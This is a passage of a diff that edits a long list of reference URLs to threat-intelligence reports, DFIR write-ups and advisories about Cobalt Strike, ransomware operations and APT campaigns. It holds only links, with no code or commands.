"https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf", - "https://github.com/AmnestyTech/investigations/tree/master/2021-02-24_vietnam", - "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/", - "https://blog.talosintelligence.com/2021/11/attackers-use-domain-fronting-technique.html", - "https://cert.gov.ua/article/37704", - "https://www.kroll.com/en/insights/publications/cyber/royal-ransomware-deep-dive", - "https://www.lac.co.jp/lacwatch/people/20180521_001638.html", - "https://www.microsoft.com/security/blog/2021/05/28/breaking-down-nobeliums-latest-early-stage-toolset/", - "https://blog.cyble.com/2022/05/20/malware-campaign-targets-infosec-community-threat-actor-uses-fake-proof-of-concept-to-deliver-cobalt-strike-beacon/", - "https://twitter.com/RedDrip7/status/1402640362972147717?s=20", - "https://labs.sentinelone.com/the-anatomy-of-an-apt-attack-and-cobaltstrike-beacons-encoded-configuration/", - "https://twitter.com/swisscom_csirt/status/1354052879158571008", - "https://www.sekoia.io/en/an-insider-insights-into-conti-operations-part-two/", - "https://isc.sans.edu/diary/28636", - "https://blog.malwarebytes.com/threat-intelligence/2022/07/cobalt-strikes-again-uac-0056-continues-to-target-ukraine-in-its-latest-campaign/", - "https://redcanary.com/blog/getsystem-offsec/", - "https://www.mandiant.com/resources/evolution-of-fin7", - "https://medium.com/walmartglobaltech/nimar-loader-4f61c090c49e", - "https://www.advanced-intel.com/post/hunting-for-corporate-insurance-policies-indicators-of-ransom-exfiltrations", - "https://www.microsoft.com/security/blog/2021/07/29/bazacall-phony-call-centers-lead-to-exfiltration-and-ransomware/", - "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", - "https://www.fintechsecurity.com.hk/slides/01.Dmitry-Annual-Group-IB-report-High-Tech-Crime-Trends.pdf", - "https://isc.sans.edu/diary/rss/26862", - 
"https://www.fireeye.com/blog/threat-research/2018/11/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign.html", - "https://isc.sans.edu/diary/26752", - "https://redcanary.com/blog/grief-ransomware/", - "https://www.microsoft.com/security/blog/2020/11/30/threat-actor-leverages-coin-miner-techniques-to-stay-under-the-radar-heres-how-to-spot-them/", - "https://www.bitdefender.com/files/News/CaseStudies/study/262/Bitdefender-WhitePaper-An-APT-Blueprint-Gaining-New-Visibility-into-Financial-Threats-interactive.pdf", - "https://www.trendmicro.com/en_us/research/22/g/gootkit-loaders-updated-tactics-and-fileless-delivery-of-cobalt-strike.html", - "https://mal-eats.net/en/2021/05/11/campo_new_attack_campaign_targeting_japan/", - "https://www.trendmicro.com/en_us/research/22/f/black-basta-ransomware-operators-expand-their-attack-arsenal-wit.html", - "https://therecord.media/mongolian-certificate-authority-hacked-eight-times-compromised-with-malware/", - "https://malwarelab.eu/posts/fin6-cobalt-strike/", - "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/new-apt-group-chamelgang", - "https://www.bleepingcomputer.com/news/security/fake-microsoft-teams-updates-lead-to-cobalt-strike-deployment/", - "http://www.secureworks.com/research/threat-profiles/gold-kingswood", - "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf", - "https://malwareandstuff.com/mustang-panda-joins-the-covid19-bandwagon/", - "https://thedfirreport.com/2021/11/29/continuing-the-bazar-ransomware-story/", - "https://blog.malwarebytes.com/threat-analysis/2020/06/multi-stage-apt-attack-drops-cobalt-strike-using-malleable-c2-feature/", - "https://www.cybereason.com/blog/deadringer-exposing-chinese-threat-actors-targeting-major-telcos", - "https://asec.ahnlab.com/ko/19640/", - 
"https://mergene.medium.com/enterprise-scale-threat-hunting-network-beacon-detection-with-unsupervised-machine-learning-and-277c4c30304f", - "https://blogs.blackberry.com/en/2021/08/blackberry-prevents-threat-actor-group-ta575-and-dridex-malware", - "https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023", - "https://www.domaintools.com/resources/blog/covid-19-phishing-with-a-side-of-cobalt-strike#", - "https://twitter.com/MsftSecIntel/status/1522690116979855360", - "https://www.secureworks.com/blog/detecting-cobalt-strike-government-sponsored-threat-groups", - "https://decoded.avast.io/threatintel/decoding-cobalt-strike-understanding-payloads/", - "https://twitter.com/cglyer/status/1480742363991580674", - "https://www.guidepointsecurity.com/from-zloader-to-darkside-a-ransomware-story/", - "https://github.com/dodo-sec/Malware-Analysis/blob/main/Cobalt%20Strike/Indirect%20Syscalls.md", - "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/787/original/ransomware-chats.pdf", - "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html", - "https://mal-eats.net/2021/05/10/campo_new_attack_campaign_targeting_japan/", - "https://decoded.avast.io/luigicamastra/backdoored-client-from-mongolian-ca-monpass/", - "https://www.splunk.com/en_us/blog/security/cloud-federated-credential-abuse-cobalt-strike-threat-research-feb-2021.html", - "https://www.crowdstrike.com/blog/prophet-spider-exploits-oracle-weblogic-to-facilitate-ransomware-activity/", - "https://blogs.blackberry.com/en/2021/10/blackberry-shines-spotlight-on-evolving-cobalt-strike-threat-in-new-book", - "https://twitter.com/th3_protoCOL/status/1433414685299142660?s=20", - "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-ransomexx", - "https://news.sophos.com/en-us/2020/10/27/mtr-casebook-an-active-adversary-caught-in-the-act/", - 
"https://www.0ffset.net/reverse-engineering/malware-analysis/squirrelwaffle-custom-packer/", - "https://www.cynet.com/attack-techniques-hands-on/new-wave-of-emotet-when-project-x-turns-into-y/", - "https://www.macnica.net/file/mpressioncss_2018-1h-report_mnc_rev3_nopw.pdf", - "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-old-dogs-new-tricks.pdf", - "https://www.crowdstrike.com/blog/how-falcon-complete-disrupts-ecrime-operators-wizard-spider/", - "https://www.intel471.com/blog/Cobalt-strike-cybercriminals-trickbot-qbot-hancitor", - "https://blog.nviso.eu/2021/10/27/cobalt-strike-using-known-private-keys-to-decrypt-traffic-part-2/", - "https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/", - "https://twitter.com/alex_lanstein/status/1399829754887524354", - "https://blog.group-ib.com/colunmtk_apt41", - "https://www.blackhillsinfosec.com/dns-over-https-for-cobalt-strike/", - "https://unit42.paloaltonetworks.com/fireeye-solarstorm-sunburst/", - "https://www.sekoia.io/en/walking-on-apt31-infrastructure-footprints/", - "https://www.mcafee.com/enterprise/en-us/assets/reports/rp-ryuk-ransomware-targeting-webservers.pdf", - "https://www.elastic.co/blog/detecting-cobalt-strike-with-memory-signatures", - "https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/", - "https://asec.ahnlab.com/en/34549/", - "https://github.com/blackorbird/APT_REPORT/blob/master/Oceanlotus/apt32_report_2019.pdf", - "https://i.blackhat.com/eu-20/Wednesday/eu-20-Clarke-Its-Not-FINished-The-Evolving-Maturity-In-Ransomware-Operations-wp.pdf", - "https://thedfirreport.com/2021/01/11/trickbot-still-alive-and-well/", - "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself", - "https://blog.group-ib.com/apt41-world-tour-2021", - "https://www.youtube.com/watch?v=C733AyPzkoc", - 
"https://blog.group-ib.com/opera1er-apt", - "https://intel471.com/blog/malware-before-ransomware-trojan-information-stealer-cobalt-strike", - "https://twitter.com/felixw3000/status/1521816045769662468", - "https://blog.fox-it.com/2019/02/26/identifying-cobalt-strike-team-servers-in-the-wild/", - "https://malware-traffic-analysis.net/2021/09/29/index.html", - "https://blog.truesec.com/2021/05/05/are-the-notorious-cyber-criminals-evil-corp-actually-russian-spies/", - "https://inteloperator.medium.com/the-default-63-6f-62-61-6c-74-strike-8ac9ee0de1b7", - "https://research.checkpoint.com/2022/bumblebee-increasing-its-capacity-and-evolving-its-ttps/", - "https://www.cynet.com/blog/orion-threat-alert-qakbot-ttps-arsenal-and-the-black-basta-ransomware/", - "https://www.guidepointsecurity.com/yet-another-cobalt-strike-loader-guid-edition/", - "https://www.mandiant.com/media/12596/download", - "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/diving-deeper-into-the-kaseya-vsa-attack-revil-returns-and-other-hackers-are-riding-their-coattails/", - "https://explore.group-ib.com/htct/hi-tech_crime_2018", - "https://jsac.jpcert.or.jp/archive/2022/pdf/JSAC2022_9_yanagishita-tamada-nakatsuru-ishimaru_en.pdf", - "https://blog.viettelcybersecurity.com/apt32-deobfuscation-arsenal-deobfuscating-mot-vai-loai-obfucation-toolkit-cua-apt32-phan-2/", - "https://sergiusechel.medium.com/improving-the-network-based-detection-of-cobalt-strike-c2-servers-in-the-wild-while-reducing-the-6964205f6468", - "https://medium.com/walmartglobaltech/man1-moskal-hancitor-and-a-side-of-ransomware-d77b4d991618", - "https://www.breachquest.com/conti-leaks-insight-into-a-ransomware-unicorn/", - "https://attack.mitre.org/groups/G0096", - "https://blog.didierstevens.com/2021/11/03/new-tool-cs-extract-key-py/", - "https://unit42.paloaltonetworks.com/bumblebee-malware-projector-libra/", - "https://www.macnica.net/file/mpression_automobile.pdf", - 
"https://inquest.net/blog/2022/04/07/ukraine-cyberwar-overview", - "https://medium.com/@shabarkin/pointer-hunting-cobalt-strike-globally-a334ac50619a", - "https://twitter.com/VK_Intel/status/1294320579311435776", - "https://www.volexity.com/blog/2021/05/27/suspected-apt29-operation-launches-election-fraud-themed-phishing-campaigns/", - "https://thedfirreport.com/2021/05/12/conti-ransomware/", - "https://vanmieghem.io/blueprint-for-evading-edr-in-2022/", - "https://www.prevailion.com/what-wicked-webs-we-unweave/", - "https://blog.gigamon.com/2021/09/10/rendering-threats-a-network-perspective/", - "https://www.secureworks.com/research/threat-profiles/gold-niagara", - "https://unit42.paloaltonetworks.com/cobalt-strike-team-server/", - "https://threatpost.com/conti-ransomware-v-3-including-decryptor-leaked/179006/", - "https://www.fortinet.com/blog/threat-research/what-we-have-learned-so-far-about-the-sunburst-solarwinds-hack", - "https://blog.sonatype.com/new-pymafka-malicious-package-drops-cobalt-strike-on-macos-windows-linux", - "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", - "https://securityscorecard.com/blog/securityscorecard-finds-usaid-hack-much-larger-than-initially-thought", - "https://thedfirreport.com/2021/03/08/bazar-drops-the-anchor/", - "https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/", - "https://resource.redcanary.com/rs/003-YRU-314/images/2022_ThreatDetectionReport_RedCanary.pdf", - "https://github.com/Apr4h/CobaltStrikeScan", - "https://unit42.paloaltonetworks.com/cobalt-strike-metadata-encryption-decryption/", - "https://www.mandiant.com/resources/darkside-affiliate-supply-chain-software-compromise", - "https://github.com/infinitumitlabs/Karakurt-Hacking-Team-CTI", - "https://www.sekoia.io/en/nobeliums-envyscout-infection-chain-goes-in-the-registry-targeting-embassies/", - "https://news.sophos.com/en-us/2021/06/02/amsi-bypasses-remain-tricks-of-the-malware-trade/", - 
"https://blog.nviso.eu/2021/11/03/cobalt-strike-using-process-memory-to-decrypt-traffic-part-3/", - "https://www.cybercom.mil/Media/News/Article/3098856/cyber-national-mission-force-discloses-iocs-from-ukrainian-networks/", - "https://www.bleepingcomputer.com/news/security/phishing-campaign-targets-russian-govt-dissidents-with-cobalt-strike/", - "https://redcanary.com/wp-content/uploads/2022/05/Gootloader.pdf", - "https://www.deepinstinct.com/2021/03/18/cobalt-strike-post-exploitation-attackers-toolkit/", - "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", - "https://www.splunk.com/en_us/blog/security/you-bet-your-lsass-hunting-lsass-access.html", - "https://cocomelonc.github.io/malware/2022/07/30/malware-av-evasion-8.html", + "https://cocomelonc.github.io/malware/2023/05/11/malware-tricks-28.html", + "https://cocomelonc.github.io/tutorial/2022/05/09/malware-pers-4.html", "https://us-cert.cisa.gov/ncas/alerts/aa20-275a", - "https://blog.cobaltstrike.com/", - "https://www.cynet.com/attack-techniques-hands-on/threats-looming-over-the-horizon/", - "https://www.fireeye.com/blog/threat-research/2021/04/unc2447-sombrat-and-fivehands-ransomware-sophisticated-financial-threat.html", - "https://www.intezer.com/blog/malware-analysis/cobalt-strike-detect-this-persistent-threat/", - "https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/", - "https://unit42.paloaltonetworks.com/cobalt-strike-metadata-encoding-decoding/", + "https://www.trendmicro.com/en_us/research/21/k/Squirrelwaffle-Exploits-ProxyShell-and-ProxyLogon-to-Hijack-Email-Chains.html", + "https://blog.talosintelligence.com/2020/09/CTIR-quarterly-trends-Q4-2020.html", + "https://mp.weixin.qq.com/s/cGS8FocPnUdBconLbbaG-g", + "https://news.sophos.com/en-us/2021/09/21/cring-ransomware-group-exploits-ancient-coldfusion-server/?cmp=30728", + "https://unit42.paloaltonetworks.com/cobalt-strike-metadata-encryption-decryption/", + 
"https://www.fortinet.com/blog/threat-research/the-year-of-the-wiper", + "https://www.trendmicro.com/de_de/research/22/j/black-basta-infiltrates-networks-via-qakbot-brute-ratel-and-coba.html", + "https://blog.group-ib.com/REvil_RaaS", + "https://www.huntress.com/blog/hackers-no-hashing-randomizing-api-hashes-to-evade-cobalt-strike-shellcode-detection", + "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/", + "https://securityscorecard.com/blog/securityscorecard-finds-usaid-hack-much-larger-than-initially-thought", + "https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q2%20Botnet%20Threat%20Update.pdf", + "https://web.br.de/interaktiv/ocean-lotus/en/", + "https://zero.bs/cobaltstrike-beacons-analyzed.html", + "https://www.bitdefender.com/files/News/CaseStudies/study/262/Bitdefender-WhitePaper-An-APT-Blueprint-Gaining-New-Visibility-into-Financial-Threats-interactive.pdf", + "https://go.recordedfuture.com/hubfs/reports/cta-2021-0107.pdf", + "https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/", + "https://rastamouse.me/ntlm-relaying-via-cobalt-strike/", + "https://www.domaintools.com/resources/blog/covid-19-phishing-with-a-side-of-cobalt-strike#", "https://thedfirreport.com/2020/11/05/ryuk-speed-run-2-hours-to-ransom/", - "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-268a", - "https://thedfirreport.com/2020/08/31/netwalker-ransomware-in-1-hour/", - "https://blog.fox-it.com/2021/01/12/abusing-cloud-services-to-fly-under-the-radar/", - "https://securityintelligence.com/posts/trickbot-group-systematically-attacking-ukraine", - "https://www.secureworks.com/research/bronze-starlight-ransomware-operations-use-hui-loader", - "https://blog.malwarebytes.com/threat-intelligence/2022/03/new-spear-phishing-campaign-targets-russian-dissidents/", - "https://blog.cyble.com/2022/06/07/bumblebee-loader-on-the-rise/", - 
"https://blog.cyble.com/2022/09/07/bumblebee-returns-with-new-infection-technique/", - "https://blog.talosintelligence.com/2021/05/lemon-duck-spreads-wings.html", - "https://unit42.paloaltonetworks.com/cobalt-strike-malleable-c2-profile/", - "https://socfortress.medium.com/detecting-cobalt-strike-beacons-3f8c9fdcb654", - "https://5851803.fs1.hubspotusercontent-na1.net/hubfs/5851803/Russian%20Ransomware%20C2%20Network%20Discovered%20in%20Censys%20Data.pdf", - "https://boschko.ca/cobalt-strike-process-injection/", - "https://twitter.com/AltShiftPrtScn/status/1350755169965924352", - "https://www.crowdstrike.com/blog/getting-the-bacon-from-cobalt-strike-beacon/", - "https://www.secureworks.com/blog/bumblebee-malware-distributed-via-trojanized-installer-downloads", - "https://news.sophos.com/en-us/2021/05/05/intervention-halts-a-proxylogon-enabled-attack", - "https://www.youtube.com/watch?v=borfuQGrB8g", - "https://cert.gov.ua/article/339662", - "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/543/original/CTIR_casestudy_1.pdf", - "https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/5/", - "https://www.mandiant.com/resources/spear-phish-ukrainian-entities", - "https://thedfirreport.com/2021/10/04/bazarloader-and-the-conti-leaks/", - "https://blog.cobaltstrike.com/2020/12/08/a-red-teamer-plays-with-jarm/", - "https://securelist.com/a-new-secret-stash-for-fileless-malware/106393/", + "https://inquest.net/blog/2022/04/07/ukraine-cyberwar-overview", + "https://www.advintel.io/post/24-hours-from-log4shell-to-local-admin-deep-dive-into-conti-gang-attack-on-fortune-500-dfir", + "https://redcanary.com/blog/intelligence-insights-december-2021", + "https://netresec.com/?b=214d7ff", + "https://thedfirreport.com/2022/09/12/dead-or-alive-an-emotet-story/", + "https://malware-traffic-analysis.net/2021/09/29/index.html", + "https://breakpoint-labs.com/blog/cobalt-strike-and-ransomware-tracking-an-effective-ransomware-campaign/", + 
"https://www.splunk.com/en_us/blog/security/you-bet-your-lsass-hunting-lsass-access.html", + "https://www.bleepingcomputer.com/news/security/phishing-campaign-targets-russian-govt-dissidents-with-cobalt-strike/", + "https://blog.zsec.uk/cobalt-strike-profiles/", + "https://www.cybereason.com/blog/deadringer-exposing-chinese-threat-actors-targeting-major-telcos", + "https://decoded.avast.io/luigicamastra/backdoored-client-from-mongolian-ca-monpass", + "https://thedfirreport.com/2021/09/13/bazarloader-to-conti-ransomware-in-32-hours/", + "https://isc.sans.edu/diary/Bumblebee+Malware+from+TransferXL+URLs/28664", + "https://insight-jp.nttsecurity.com/post/102ho8o/operation-restylink", + "https://twitter.com/GossiTheDog/status/1438500100238577670", + "https://unit42.paloaltonetworks.com/cobalt-strike-team-server/", + "https://www.mandiant.com/resources/apt41-us-state-governments", + "https://twitter.com/swisscom_csirt/status/1354052879158571008", + "https://noticeofpleadings.com/crackedcobaltstrike/files/ComplaintAndSummons/1%20-Microsoft%20Cobalt%20Strike%20-%20Complaint(907040021.9).pdf", + "https://www.trustnet.co.il/blog/virus-alert-to-powershell-encrypted-loader/", + "https://go.recordedfuture.com/hubfs/reports/mtp-2021-0914.pdf", + "https://thedfirreport.com/2021/01/11/trickbot-still-alive-and-well/", + "https://www.getrevue.co/profile/80vul/issues/hunting-cobalt-strike-dns-redirectors-by-using-zoomeye-580734", + "https://twitter.com/ffforward/status/1324281530026524672", + "https://blogs.blackberry.com/en/2021/08/blackberry-prevents-threat-actor-group-ta575-and-dridex-malware", + "https://www.bleepingcomputer.com/news/security/emotet-now-drops-cobalt-strike-fast-forwards-ransomware-attacks/", + "https://blog.group-ib.com/opera1er-apt", + "https://blog.reconinfosec.com/analysis-of-exploitation-cve-2020-10189/", + "https://blog.group-ib.com/colunmtk_apt41", + "https://research.nccgroup.com/2022/03/25/mining-data-from-cobalt-strike-beacons/", + 
"https://www.cyber.gov.au/sites/default/files/2020-06/ACSC-Advisory-2020-008-Copy-Paste-Compromises.pdf",
+ "https://blog.nviso.eu/2021/04/26/anatomy-of-cobalt-strike-dll-stagers/",
+ "https://twitter.com/vikas891/status/1385306823662587905",
+ "https://blog.cobaltstrike.com/",
+ "https://cocomelonc.github.io/malware/2022/07/30/malware-av-evasion-8.html",
+ "https://blog.prevailion.com/wizard-spider-continues-to-confound-4298370f6903",
+ "https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/",
+ "https://twitter.com/cglyer/status/1480742363991580674",
+ "https://pkb1s.github.io/Relay-attacks-via-Cobalt-Strike-beacons/",
+ "https://blog.sonatype.com/new-pymafka-malicious-package-drops-cobalt-strike-on-macos-windows-linux",
+ "https://malwareandstuff.com/mustang-panda-joins-the-covid19-bandwagon/",
+ "https://www.sentinelone.com/blog/bluesky-ransomware-ad-lateral-movement-evasion-and-fast-encryption-puts-threat-on-the-radar/",
+ "https://thedfirreport.com/2020/04/24/ursnif-via-lolbins/",
+ "https://www.deepinstinct.com/2021/03/18/cobalt-strike-post-exploitation-attackers-toolkit/",
+ "https://thedfirreport.com/2021/11/29/continuing-the-bazar-ransomware-story/",
+ "https://www.youtube.com/watch?v=C733AyPzkoc",
+ "https://labs.sentinelone.com/the-anatomy-of-an-apt-attack-and-cobaltstrike-beacons-encoded-configuration/",
+ "https://unit42.paloaltonetworks.com/bazarloader-network-reconnaissance/",
+ "https://michaelkoczwara.medium.com/hunting-c2-with-shodan-223ca250d06f",
+ "https://blog.cobaltstrike.com/2021/02/09/learn-pipe-fitting-for-all-of-your-offense-projects/",
+ "https://blog.nviso.eu/2021/11/17/cobalt-strike-decrypting-obfuscated-traffic-part-4/",
+ "https://blogs.blackberry.com/en/2021/11/zebra2104",
+ "https://sergiusechel.medium.com/improving-the-network-based-detection-of-cobalt-strike-c2-servers-in-the-wild-while-reducing-the-6964205f6468",
+ "https://www.mandiant.com/resources/evolution-of-fin7",
+ "https://www.kroll.com/en/insights/publications/cyber/black-basta-technical-analysis",
+ "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/",
+ "https://www.microsoft.com/security/blog/2021/07/29/bazacall-phony-call-centers-lead-to-exfiltration-and-ransomware/",
+ "https://isc.sans.edu/diary/rss/28934",
+ "https://cybleinc.com/2020/11/17/oceanlotus-continues-with-its-cyber-espionage-operations/",
+ "https://thedfirreport.com/2021/01/31/bazar-no-ryuk/",
+ "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
+ "https://www.cynet.com/blog/orion-threat-alert-qakbot-ttps-arsenal-and-the-black-basta-ransomware/",
+ "https://embee-research.ghost.io/shodan-censys-queries/",
+ "https://thedfirreport.com/2021/07/19/icedid-and-cobalt-strike-vs-antivirus/",
+ "https://content.fireeye.com/m-trends/rpt-m-trends-2020",
+ "https://www.prodaft.com/m/uploads/SilverFish_TLPWHITE.pdf",
+ "https://www.secureworks.com/research/threat-profiles/gold-dupont",
 "https://mp.weixin.qq.com/s/xPsEXp2J5IE7wNSMEVC24A",
- "https://redcanary.com/blog/gootloader",
- "https://blogs.blackberry.com/en/2021/10/drawing-a-dragon-connecting-the-dots-to-find-apt41",
+ "https://blog.nviso.eu/2022/07/20/analysis-of-a-trojanized-jquery-script-gootloader-unleashed/",
+ "https://blog.nviso.eu/2021/10/21/cobalt-strike-using-known-private-keys-to-decrypt-traffic-part-1/",
+ "https://www.qurium.org/alerts/targeted-malware-against-crph/",
+ "https://www.cynet.com/understanding-squirrelwaffle/",
+ "https://quake.360.cn/quake/#/reportDetail?id=5fc6fedd191038c3b25c4950",
+ "https://www.zscaler.com/blogs/research/targeted-attack-leverages-india-china-border-dispute-lure-victims",
+ "https://blog.cyble.com/2022/05/20/malware-campaign-targets-infosec-community-threat-actor-uses-fake-proof-of-concept-to-deliver-cobalt-strike-beacon/",
+ "https://services.google.com/fh/files/blogs/gcat_threathorizons_full_jul2023.pdf",
+ "https://github.com/Apr4h/CobaltStrikeScan",
+ "https://unit42.paloaltonetworks.com/bumblebee-malware-projector-libra/",
+ "https://i.blackhat.com/Asia-22/Thursday-Materials/AS-22-LeonSilvia-NextGenPlugXShadowPad.pdf",
+ "https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/",
+ "https://securelist.com/apt-trends-report-q2-2020/97937/",
+ "https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/",
+ "https://www.lac.co.jp/lacwatch/people/20180521_001638.html",
+ "https://www.microsoft.com/security/blog/2022/04/13/dismantling-zloader-how-malicious-ads-led-to-disabled-security-tools-and-ransomware/",
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf",
+ "https://twitter.com/Unit42_Intel/status/1421117403644186629?s=20",
+ "https://www.blackarrow.net/leveraging-microsoft-teams-to-persist-and-cover-up-cobalt-strike-traffic/",
+ "https://www.secureworks.com/blog/detecting-cobalt-strike-cybercrime-attacks",
+ "https://blog.malwarebytes.com/threat-analysis/2020/06/multi-stage-apt-attack-drops-cobalt-strike-using-malleable-c2-feature/",
+ "https://thedfirreport.com/2022/03/07/2021-year-in-review/",
+ "https://explore.group-ib.com/htct/hi-tech_crime_2018",
+ "https://news.sophos.com/en-us/2022/08/18/cookie-stealing-the-new-perimeter-bypass",
+ "https://www.mandiant.com/resources/tracking-apt29-phishing-campaigns",
+ "https://twitter.com/AltShiftPrtScn/status/1385103712918642688",
+ "https://morphuslabs.com/attackers-are-abusing-msbuild-to-evade-defenses-and-implant-cobalt-strike-beacons-edac4ab84f42",
+ "https://www.trendmicro.com/en_us/research/21/a/earth-wendigo-injects-javascript-backdoor-to-service-worker-for-.html",
+ "https://bmcder.com/blog/extracting-cobalt-strike-from-windows-error-reporting",
+ "https://attack.mitre.org/groups/G0096",
+ "https://www.crowdstrike.com/blog/how-crowdstrike-threat-hunters-identified-a-confluence-exploit/",
+ "https://www.microsoft.com/security/blog/2020/11/30/threat-actor-leverages-coin-miner-techniques-to-stay-under-the-radar-heres-how-to-spot-them/",
+ "https://isc.sans.edu/diary/rss/28448",
+ "https://www.europol.europa.eu/newsroom/news/12-targeted-for-involvement-in-ransomware-attacks-against-critical-infrastructure",
+ "https://www.prevailion.com/what-wicked-webs-we-unweave/",
+ "https://blog.cobaltstrike.com/2020/12/08/a-red-teamer-plays-with-jarm/",
+ "http://www.secureworks.com/research/threat-profiles/gold-kingswood",
+ "https://www.0ffset.net/reverse-engineering/malware-analysis/squirrelwaffle-custom-packer/",
+ "https://blog.morphisec.com/log4j-exploit-targets-vulnerable-unifi-network-applications",
+ "https://michaelkoczwara.medium.com/mapping-and-pivoting-cobalt-strike-c2-infrastructure-attributed-to-cve-2021-40444-438786fcd68a",
+ "https://www.trendmicro.com/en_us/research/21/g/tracking_cobalt_strike_a_vision_one_investigation.html",
+ "https://www.fortinet.com/blog/threat-research/nobelium-returns-to-the-political-world-stage",
+ "https://www.trendmicro.com/en_us/research/22/g/gootkit-loaders-updated-tactics-and-fileless-delivery-of-cobalt-strike.html",
+ "https://asec.ahnlab.com/ko/19640/",
+ "https://inteloperator.medium.com/the-default-63-6f-62-61-6c-74-strike-8ac9ee0de1b7",
+ "https://securelist.com/a-new-secret-stash-for-fileless-malware/106393/",
+ "https://www.proofpoint.com/us/blog/threat-insight/cobalt-strike-favorite-tool-apt-crimeware",
+ "https://lab52.io/blog/the-energy-reserves-in-the-eastern-mediterranean-sea-and-a-malicious-campaign-of-apt10-against-turkey/",
+ "https://www.youtube.com/watch?v=y65hmcLIWDY",
+ "https://www.advanced-intel.com/post/anatomy-of-attack-inside-bazarbackdoor-to-ryuk-ransomware-one-group-via-cobalt-strike",
+ "https://socfortress.medium.com/detecting-cobalt-strike-beacons-3f8c9fdcb654",
+ "https://www.microsoft.com/security/blog/2021/09/15/analyzing-attacks-that-exploit-the-mshtml-cve-2021-40444-vulnerability/",
+ "https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html",
+ "https://labs.sentinelone.com/noblebaron-new-poisoned-installers-could-be-used-in-supply-chain-attacks/",
+ "https://www.cybereason.com/blog/threat-analysis-report-bumblebee-loader-the-high-road-to-enterprise-domain-control",
+ "https://twitter.com/Unit42_Intel/status/1458113934024757256",
+ "https://isc.sans.edu/diary/rss/28664",
+ "https://www.huntress.com/blog/cobalt-strike-analysis-of-obfuscated-malware",
+ "https://enterprise.verizon.com/resources/reports/2019-data-breach-investigations-report.pdf",
+ "https://www.zscaler.com/blogs/security-research/squirrelwaffle-new-loader-delivering-cobalt-strike",
+ "https://medium.com/walmartglobaltech/signed-dll-campaigns-as-a-service-7760ac676489",
+ "https://twitter.com/TheDFIRReport/status/1359669513520873473",
+ "https://www.advanced-intel.com/post/secret-backdoor-behind-conti-ransomware-operation-introducing-atera-agent",
+ "https://msrc.microsoft.com/blog/2022/10/hunting-for-cobalt-strike-mining-and-plotting-for-fun-and-profit/",
+ "https://www.youtube.com/watch?v=LA-XE5Jy2kU",
+ "https://www.bleepingcomputer.com/news/security/vulnerable-microsoft-sql-servers-targeted-with-cobalt-strike/",
+ "http://www.secureworks.com/research/threat-profiles/gold-winter",
+ "https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html",
+ "https://blog.talosintelligence.com/2021/05/ctir-case-study.html",
+ "https://blogs.blackberry.com/en/2021/10/blackberry-shines-spotlight-on-evolving-cobalt-strike-threat-in-new-book",
+ "https://twitter.com/AltShiftPrtScn/status/1403707430765273095",
+ "https://www.mandiant.com/resources/defining-cobalt-strike-components",
+ "https://medium.com/walmartglobaltech/investigation-into-the-state-of-nim-malware-14cc543af811",
+ "https://labs.sentinelone.com/egregor-raas-continues-the-chaos-with-cobalt-strike-and-rclone/",
+ "https://blog.gigamon.com/2021/09/10/rendering-threats-a-network-perspective/",
+ "https://medium.com/walmartglobaltech/man1-moskal-hancitor-and-a-side-of-ransomware-d77b4d991618",
+ "https://thedfirreport.com/2022/01/24/cobalt-strike-a-defenders-guide-part-2/",
+ "https://www.inde.nz/blog/different-kind-of-zoombomb",
+ "https://www.sans.org/webcasts/contrarian-view-solarwinds-119515",
+ "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/csi-evidence-indicators-for-targeted-ransomware-attacks-part-ii/",
+ "https://www.youtube.com/watch?v=FC9ARZIZglI",
+ "https://thedfirreport.com/2022/04/25/quantum-ransomware/",
+ "https://www.bitsight.com/blog/emotet-botnet-rises-again",
+ "https://thehackernews.com/2022/05/this-new-fileless-malware-hides.html",
